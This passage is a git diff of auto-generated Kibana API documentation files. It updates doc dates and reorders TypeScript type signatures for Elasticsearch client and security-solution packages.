a/api_docs/kbn_ml_is_populated_object.mdx +++ b/api_docs/kbn_ml_is_populated_object.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ml-is-populated-object title: "@kbn/ml-is-populated-object" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ml-is-populated-object plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ml-is-populated-object'] --- import kbnMlIsPopulatedObjectObj from './kbn_ml_is_populated_object.devdocs.json'; diff --git a/api_docs/kbn_ml_string_hash.mdx b/api_docs/kbn_ml_string_hash.mdx index 8f5063e2b9487..25e37391bb246 100644 --- a/api_docs/kbn_ml_string_hash.mdx +++ b/api_docs/kbn_ml_string_hash.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ml-string-hash title: "@kbn/ml-string-hash" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ml-string-hash plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ml-string-hash'] --- import kbnMlStringHashObj from './kbn_ml_string_hash.devdocs.json'; diff --git a/api_docs/kbn_monaco.mdx b/api_docs/kbn_monaco.mdx index 12b966902bd5b..509eaf07ab9b7 100644 --- a/api_docs/kbn_monaco.mdx +++ b/api_docs/kbn_monaco.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-monaco title: "@kbn/monaco" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/monaco plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/monaco'] --- import kbnMonacoObj from './kbn_monaco.devdocs.json'; diff --git a/api_docs/kbn_optimizer.mdx b/api_docs/kbn_optimizer.mdx index d566d2193cdee..cb2e8e20206bb 100644 --- a/api_docs/kbn_optimizer.mdx +++ b/api_docs/kbn_optimizer.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-optimizer title: "@kbn/optimizer" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/optimizer plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/optimizer'] --- import kbnOptimizerObj from './kbn_optimizer.devdocs.json'; diff --git a/api_docs/kbn_optimizer_webpack_helpers.mdx b/api_docs/kbn_optimizer_webpack_helpers.mdx index 5fdbf8766806f..ae33d9778e5cd 100644 --- a/api_docs/kbn_optimizer_webpack_helpers.mdx +++ b/api_docs/kbn_optimizer_webpack_helpers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-optimizer-webpack-helpers title: "@kbn/optimizer-webpack-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/optimizer-webpack-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/optimizer-webpack-helpers'] --- import kbnOptimizerWebpackHelpersObj from './kbn_optimizer_webpack_helpers.devdocs.json'; diff --git a/api_docs/kbn_performance_testing_dataset_extractor.mdx b/api_docs/kbn_performance_testing_dataset_extractor.mdx index 2f84485d02a2b..3cfa795d74c97 100644 --- a/api_docs/kbn_performance_testing_dataset_extractor.mdx +++ b/api_docs/kbn_performance_testing_dataset_extractor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-performance-testing-dataset-extractor title: "@kbn/performance-testing-dataset-extractor" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/performance-testing-dataset-extractor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/performance-testing-dataset-extractor'] --- import kbnPerformanceTestingDatasetExtractorObj from './kbn_performance_testing_dataset_extractor.devdocs.json'; diff --git a/api_docs/kbn_plugin_generator.mdx b/api_docs/kbn_plugin_generator.mdx index e1e4b0a6c9217..c52df5f692a34 100644 --- a/api_docs/kbn_plugin_generator.mdx +++ b/api_docs/kbn_plugin_generator.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-plugin-generator title: "@kbn/plugin-generator" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/plugin-generator plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/plugin-generator'] --- import kbnPluginGeneratorObj from './kbn_plugin_generator.devdocs.json'; diff --git a/api_docs/kbn_plugin_helpers.mdx b/api_docs/kbn_plugin_helpers.mdx index 07e20a4b4c69c..cefe6b19b09d5 100644 --- a/api_docs/kbn_plugin_helpers.mdx +++ b/api_docs/kbn_plugin_helpers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-plugin-helpers title: "@kbn/plugin-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/plugin-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/plugin-helpers'] --- import kbnPluginHelpersObj from './kbn_plugin_helpers.devdocs.json'; diff --git a/api_docs/kbn_react_field.devdocs.json b/api_docs/kbn_react_field.devdocs.json index 64ce7f66c3796..009157238dbe8 100644 --- a/api_docs/kbn_react_field.devdocs.json +++ b/api_docs/kbn_react_field.devdocs.json @@ -233,7 +233,7 @@ "\nUse the small size in condensed areas" ], "signature": [ - "\"s\" | \"m\" | undefined" + "\"m\" | \"s\" | undefined" ], "path": "packages/kbn-react-field/src/field_button/field_button.tsx", "deprecated": false @@ -375,7 +375,7 @@ "label": "ButtonSize", "description": [], "signature": [ - "\"s\" | \"m\"" + "\"m\" | \"s\"" ], "path": "packages/kbn-react-field/src/field_button/field_button.tsx", "deprecated": false, diff --git a/api_docs/kbn_react_field.mdx b/api_docs/kbn_react_field.mdx index 505d6ae6d2ef3..2b33a58d5db7d 100644 --- a/api_docs/kbn_react_field.mdx +++ b/api_docs/kbn_react_field.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-react-field title: "@kbn/react-field" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/react-field plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/react-field'] --- import kbnReactFieldObj from './kbn_react_field.devdocs.json'; diff --git a/api_docs/kbn_repo_source_classifier.mdx b/api_docs/kbn_repo_source_classifier.mdx index ad45340550c93..ac6d045f9fc90 100644 --- a/api_docs/kbn_repo_source_classifier.mdx +++ b/api_docs/kbn_repo_source_classifier.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-repo-source-classifier title: "@kbn/repo-source-classifier" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/repo-source-classifier plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/repo-source-classifier'] --- import kbnRepoSourceClassifierObj from './kbn_repo_source_classifier.devdocs.json'; diff --git a/api_docs/kbn_rule_data_utils.mdx b/api_docs/kbn_rule_data_utils.mdx index 08a36747ccf2a..d98d1e9372c08 100644 --- a/api_docs/kbn_rule_data_utils.mdx +++ b/api_docs/kbn_rule_data_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-rule-data-utils title: "@kbn/rule-data-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/rule-data-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/rule-data-utils'] --- import kbnRuleDataUtilsObj from './kbn_rule_data_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_autocomplete.devdocs.json b/api_docs/kbn_securitysolution_autocomplete.devdocs.json index 9e5c951dbd325..a510ecf234a9e 100644 --- a/api_docs/kbn_securitysolution_autocomplete.devdocs.json +++ b/api_docs/kbn_securitysolution_autocomplete.devdocs.json @@ -305,9 +305,9 @@ "\nGiven an array of lists and optionally a field this will return all\nthe lists that match against the field based on the types from the field\n\nNOTE: That we support one additional property from \"FieldSpec\" located here:\nsrc/plugins/data/common/index_patterns/fields/types.ts\nThis type property is esTypes. If it exists and is on there we will read off the esTypes." ], "signature": [ - "(lists: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[], field?: (", + "(lists: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[], field?: (", "DataViewFieldBase", - " & { esTypes?: string[] | undefined; }) | undefined) => { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" + " & { esTypes?: string[] | undefined; }) | undefined) => { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" ], "path": "packages/kbn-securitysolution-autocomplete/src/filter_field_to_list/index.ts", "deprecated": false, @@ -322,7 +322,7 @@ "The lists to match against the field" ], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" ], "path": "packages/kbn-securitysolution-autocomplete/src/filter_field_to_list/index.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_autocomplete.mdx b/api_docs/kbn_securitysolution_autocomplete.mdx index 67a5203e5bd8f..00d5c007b886d 100644 --- a/api_docs/kbn_securitysolution_autocomplete.mdx +++ b/api_docs/kbn_securitysolution_autocomplete.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-autocomplete title: "@kbn/securitysolution-autocomplete" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-autocomplete plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-autocomplete'] --- import kbnSecuritysolutionAutocompleteObj from './kbn_securitysolution_autocomplete.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_es_utils.devdocs.json b/api_docs/kbn_securitysolution_es_utils.devdocs.json index 6a4f5b028f3c4..821e948cf359b 100644 --- a/api_docs/kbn_securitysolution_es_utils.devdocs.json +++ b/api_docs/kbn_securitysolution_es_utils.devdocs.json @@ -435,7 +435,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -503,7 +553,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -529,33 +579,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -581,33 +605,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1563,6 +1561,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -1677,7 +1677,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -1745,7 +1795,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -1771,33 +1821,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -1823,33 +1847,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -2805,6 +2803,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/kbn_securitysolution_es_utils.mdx b/api_docs/kbn_securitysolution_es_utils.mdx index 84fed7de52a32..9aab6bf074430 100644 --- a/api_docs/kbn_securitysolution_es_utils.mdx +++ b/api_docs/kbn_securitysolution_es_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-es-utils title: "@kbn/securitysolution-es-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-es-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-es-utils'] --- import kbnSecuritysolutionEsUtilsObj from './kbn_securitysolution_es_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_hook_utils.mdx b/api_docs/kbn_securitysolution_hook_utils.mdx index a7c1b40b74a0b..19bd27e714fb5 100644 --- a/api_docs/kbn_securitysolution_hook_utils.mdx +++ b/api_docs/kbn_securitysolution_hook_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-hook-utils title: "@kbn/securitysolution-hook-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-hook-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-hook-utils'] --- import kbnSecuritysolutionHookUtilsObj from './kbn_securitysolution_hook_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json b/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json index 3254f3ff0380c..71af5adccadde 100644 --- a/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json +++ b/api_docs/kbn_securitysolution_io_ts_alerting_types.devdocs.json @@ -846,7 +846,7 @@ "label": "Type", "description": [], "signature": [ - "\"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" + "\"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" ], "path": "packages/kbn-securitysolution-io-ts-alerting-types/src/type/index.ts", "deprecated": false, @@ -860,7 +860,7 @@ "label": "TypeOrUndefined", "description": [], "signature": [ - "\"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\" | undefined" + "\"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\" | undefined" ], "path": "packages/kbn-securitysolution-io-ts-alerting-types/src/type/index.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx b/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx index afc8d07926d97..da11fe7721ba4 100644 --- a/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx +++ b/api_docs/kbn_securitysolution_io_ts_alerting_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-alerting-types title: "@kbn/securitysolution-io-ts-alerting-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-alerting-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-alerting-types'] --- import kbnSecuritysolutionIoTsAlertingTypesObj from './kbn_securitysolution_io_ts_alerting_types.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json b/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json index 7d8d22d454a68..5261280f27b3f 100644 --- a/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json +++ b/api_docs/kbn_securitysolution_io_ts_list_types.devdocs.json @@ -27,7 +27,7 @@ "label": "updateExceptionListItemValidate", "description": [], "signature": [ - "(schema: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" + "(schema: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => string[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_validation/index.ts", "deprecated": false, @@ 